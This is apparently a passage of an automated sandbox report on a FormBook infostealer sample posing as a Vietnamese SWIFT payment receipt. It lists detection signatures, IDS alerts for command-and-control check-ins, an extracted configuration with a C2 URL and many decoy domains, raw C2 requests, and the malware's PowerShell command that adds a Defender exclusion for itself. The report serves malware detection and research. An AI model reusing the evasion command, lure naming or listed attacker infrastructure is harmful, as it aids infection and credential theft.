01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa89da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd5dfa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x88869:$sqlite3step: 68 34 1C 7B E1 0x8897c:$sqlite3step: 68 34 1C 7B E1 0xb6c89:$sqlite3step: 68 34 1C 7B E1 0xb6d9c:$sqlite3step: 68 34 1C 7B E1 0xe40a9:$sqlite3step: 68 34 1C 7B E1 0xe41bc:$sqlite3step: 68 34 1C 7B E1 0x88898:$sqlite3text: 68 38 2A 90 C5 0x889bd:$sqlite3text: 68 38 2A 90 C5 0xb6cb8:$sqlite3text: 68 38 2A 90 C5 0xb6ddd:$sqlite3text: 68 38 2A 90 C5 0xe40d8:$sqlite3text: 68 38 2A 90 C5 0xe41fd:$sqlite3text: 68 38 2A 90 C5 0x888ab:$sqlite3blob: 68 53 D8 7F 8C 0x889d3:$sqlite3blob: 68 53 D8 7F 8C 0xb6ccb:$sqlite3blob: 68 53 D8 7F 8C 0xb6df3:$sqlite3blob: 68 53 D8 7F 8C 0xe40eb:$sqlite3blob: 68 53 D8 7F 8C 0xe4213:$sqlite3blob: 68 53 D8 7F 8C
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe6291:$a1: 3C 30 50 4F 53 54 74 09 40 0x1146b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x141ad1:$a1: 3C 30 50 4F 53 54 74 09 40 0xfcc00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x12b020:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x158440:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xeaa0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x118e2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14624f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xf58f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x123d17:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x151137:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe9948:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe9bc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117d68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117fe2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x145188:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x145402:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf56f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123b15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x150f35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf51e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x123601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150a21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf57f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x123c17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x151037:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf596f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x123d8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1511af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xea5da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x145e1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf8889:$sqlite3step: 68 34 1C 7B E1 0xf899c:$sqlite3step: 68 34 1C 7B E1 0x126ca9:$sqlite3step: 68 34 1C 7B E1 0x126dbc:$sqlite3step: 68 34 1C 7B E1 0x1540c9:$sqlite3step: 68 34 1C 7B E1 0x1541dc:$sqlite3step: 68 34 1C 7B E1 0xf88b8:$sqlite3text: 68 38 2A 90 C5 0xf89dd:$sqlite3text: 68 38 2A 90 C5 0x126cd8:$sqlite3text: 68 38 2A 90 C5 0x126dfd:$sqlite3text: 68 38 2A 90 C5 0x1540f8:$sqlite3text: 68 38 2A 90 C5 0x15421d:$sqlite3text: 68 38 2A 90 C5 0xf88cb:$sqlite3blob: 68 53 D8 7F 8C 0xf89f3:$sqlite3blob: 68 53 D8 7F 8C 0x126ceb:$sqlite3blob: 68 53 D8 7F 8C 0x126e13:$sqlite3blob: 68 53 D8 7F 8C 0x15410b:$sqlite3blob: 68 53 D8 7F 8C 0x154233:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", ParentImage: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, ParentProcessId: 5920, ParentProcessName: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", ProcessId: 6468, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", ParentImage: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, ParentProcessId: 5920, ParentProcessName: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe", ProcessId: 6468, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-08-09T09:23:41.928739+0200
SID:	2031453
Severity:	1
Source Port:	50152
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 119.3.37.137

Timestamp:	2024-08-09T09:23:06.633806+0200
SID:	2031453
Severity:	1
Source Port:	50149
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 185.148.106.70

Timestamp:	2024-08-09T09:22:41.789121+0200
SID:	2031453
Severity:	1
Source Port:	50146
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag==	Avira URL Cloud: Label: malware
Source: http://www.shrisona.com	Avira URL Cloud: Label: malware
Source: http://www.pureamyl.com/pz12/www.317wb.com	Avira URL Cloud: Label: malware
Source: http://www.shrisona.com/pz12/	Avira URL Cloud: Label: malware
Source: http://www.motchillssss.top	Avira URL Cloud: Label: malware
Source: http://www.autonwheels.com	Avira URL Cloud: Label: malware
Source: http://www.loyalbahis356.com/pz12/www.guangdongqiangzhetc.com	Avira URL Cloud: Label: malware
Source: http://www.motchillssss.top/pz12/	Avira URL Cloud: Label: malware
Source: http://www.autonwheels.com/pz12/	Avira URL Cloud: Label: malware
Source: http://www.missorris.com/pz12/www.shrisona.com	Avira URL Cloud: Label: malware
Source: http://www.autonwheels.com/pz12/www.slotgame99.bet	Avira URL Cloud: Label: malware
Source: http://www.loyalbahis356.com	Avira URL Cloud: Label: malware
Source: http://www.shrisona.com/pz12/www.cripmz.xyz	Avira URL Cloud: Label: malware
Source: https://loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/	Avira URL Cloud: Label: malware
Source: http://www.missorris.com/pz12/	Avira URL Cloud: Label: malware
Source: http://www.nuevobajonfavorito.com/pz12/	Avira URL Cloud: Label: malware
Source: http://www.pureamyl.com/pz12/	Avira URL Cloud: Label: malware
Source: http://www.motchillssss.top/pz12/www.98980901.com	Avira URL Cloud: Label: malware
Source: http://www.nuevobajonfavorito.com/pz12/www.jnhdh8827.com	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.jnhdh8827.com/pz12/"], "decoy": ["paucanyes.com", "autonwheels.com", "cowboysandcaviarbar.com", "fitnessuseredworkouts.com", "nuevobajonfavorito.com", "dflx8.com", "rothability.com", "sxybet88.com", "onesource.live", "brenjitu1904.com", "airdrop-zero1labs.com", "guangdongqiangzhetc.com", "apartments-for-rent-72254.bond", "ombak99.lol", "qqfoodsolutions.com", "kyyzz.com", "thepicklematch.com", "ainth.com", "missorris.com", "gabbygomez.com", "aromacuppa.com", "kaskusbagus.com", "zoox1.asia", "hemophilia-treatment-41433.bond", "meidupro.com", "shrisona.com", "sekanse.com", "marcocostasax.com", "loyalbahis356.com", "mzmz97.com", "ma-google.com", "xiangadvanced.site", "tuotalogis.com", "xcxocef.shop", "fidgetbottles.com", "shuaninvolved.site", "ambientelatino.com", "98980901.com", "singhbrothersframes.com", "pureamyl.com", "hgs0713.net", "surejobzapp.com", "slotgame99.bet", "datalakeflow.com", "ebehemin.com", "vanessasmobilespa.com", "317wb.com", "motchillssss.top", "huesch.net", "salesgymshark.shop", "mejorcompra99.com", "tacubashop.com", "jessicaxsimmons.com", "roar-stores.com", "chalkandthimble.com", "84556.vip", "luyutuwen.com", "siliconcollege.icu", "marvowhite.com", "gjxuh82y0u3h6.top", "e2taop5.top", "businessbroadway.com", "cripmz.xyz", "4hu259.com"]}

Multi AV Scanner detection for domain / URL

Source: www.jnhdh8827.com	Virustotal: Detection: 11%	Perma Link
Source: www.jnhdh8827.com/pz12/	Virustotal: Detection: 12%	Perma Link
Source: http://www.shrisona.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.jnhdh8827.com/pz12/www.ma-google.com	Virustotal: Detection: 12%	Perma Link
Source: http://www.autonwheels.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.slotgame99.bet	Virustotal: Detection: 7%	Perma Link
Source: http://www.autonwheels.com/pz12/	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	ReversingLabs: Detection: 58%
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Virustotal: Detection: 53%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Joe Sandbox ML: detected

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2231174141.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2228754932.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2231174141.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2228754932.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2228323315.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2231435212.000000000500B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2228323315.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2231435212.000000000500B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4x nop then pop ebx	4_2_00407B1B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4x nop then pop edi	4_2_00416CEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop ebx	7_2_03287B1B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop edi	7_2_03296CEB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.jnhdh8827.com/pz12/

Source: global traffic	HTTP traffic detected: GET /pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag== HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?uTm4D=rT/73z/FHFKsO0wYdmnc3t2OPINEEa6kIjITgDoEX6ai3/vo6h3AOPFXSKl3lYmsmBcXMl/3wg==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1Host: www.guangdongqiangzhetc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1Host: www.jnhdh8827.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_1158FF82 getaddrinfo,setsockopt,recv,

6_2_1158FF82

Source: global traffic	HTTP traffic detected: GET /pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag== HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?uTm4D=rT/73z/FHFKsO0wYdmnc3t2OPINEEa6kIjITgDoEX6ai3/vo6h3AOPFXSKl3lYmsmBcXMl/3wg==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1Host: www.guangdongqiangzhetc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1Host: www.jnhdh8827.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.loyalbahis356.com
Source: global traffic	DNS traffic detected: DNS query: www.guangdongqiangzhetc.com
Source: global traffic	DNS traffic detected: DNS query: www.nuevobajonfavorito.com
Source: global traffic	DNS traffic detected: DNS query: www.jnhdh8827.com
Source: global traffic	DNS traffic detected: DNS query: www.ma-google.com

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50152 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50152 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50152 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50146 -> 185.148.106.70:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50146 -> 185.148.106.70:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50146 -> 185.148.106.70:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50149 -> 119.3.37.137:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50149 -> 119.3.37.137:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:50149 -> 119.3.37.137:80

Source: explorer.exe, 00000006.00000000.2173161867.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000000.2173161867.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.2173161867.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000000.2173161867.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.3364148653.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3364126550.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2157798037.00000000028A0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2163845733.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.com
Source: explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com/pz12/www.autonwheels.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ainth.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ainth.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ainth.com/pz12/www.motchillssss.top
